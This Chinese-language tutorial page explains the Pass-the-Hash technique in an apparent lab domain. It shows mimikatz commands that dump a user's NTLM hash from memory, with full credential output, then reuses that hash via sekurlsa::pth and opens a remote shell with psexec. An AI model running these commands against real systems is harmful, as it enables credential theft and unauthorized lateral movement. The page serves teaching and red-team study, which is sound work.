Pass-The-Hash

DeeLMind小于 1 分钟

Pass-The-Hash

Pass-the-Hash是一种凭证盗窃和横向移动技术,攻击者滥用 NTLM 身份验证协议以用户身份进行身份验证,而无需获得帐户的明文密码。由于攻击者使用密码散列,通常仅在密码本身更改时才会更改,因此攻击者有大量时间滥用受感染的帐户。

攻击步骤

  • 获取用户HASH
mimikatz

sekurlsa::logonpasswords

Authentication Id : 0 ; 485931 (00000000:00076a2b)
Session           : RemoteInteractive from 2
User Name         : vagrant
Domain            : DEELMIND
Logon Server      : ROOT
Logon Time        : 10/27/2022 10:38:39 AM
SID               : S-1-5-21-3330634377-1326264276-632209373-1000
        msv :
         [00000003] Primary
         * Username : vagrant
         * Domain   : DEELMIND
         * NTLM     : e02bc503339d51f71d913c245d35b50b
         * SHA1     : c805f88436bcd9ff534ee86c59ed230437505ecf
         * DPAPI    : 3cfc6375c63f5ba465ab84fdf22d6ffe
        tspkg :
        wdigest :
         * Username : vagrant
         * Domain   : DEELMIND
         * Password : (null)
        kerberos :
         * Username : vagrant
         * Domain   : DEELMIND.LAB
         * Password : (null)
        ssp :
        credman :
  • PTH
privilege::debug

sekurlsa::pth /user:vagrant /domain:deelmind.lab /ntlm:e02bc503339d51f71d913c245d35b50b

mimikatz # sekurlsa::pth /user:vagrant /domain:deelmind.lab /ntlm:e02bc503339d51f71d913c245d35b50b
user    : vagrant
domain  : deelmind.lab
program : cmd.exe
impers. : no
NTLM    : e02bc503339d51f71d913c245d35b50b
  |  PID  33544
  |  TID  1360
  |  LSA Process is now R/W
  |  LUID 0 ; 20418271 (00000000:01378edf)
  \_ msv1_0   - data copy @ 00000152E3CB6640 : OK !
  \_ kerberos - data copy @ 00000152E3BB7F48
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 00000152E2C6EBE8 (32) -> null
  • 连接SHELL
psexec64.exe \\root powershell
上次编辑于:
贡献者: DeeLMind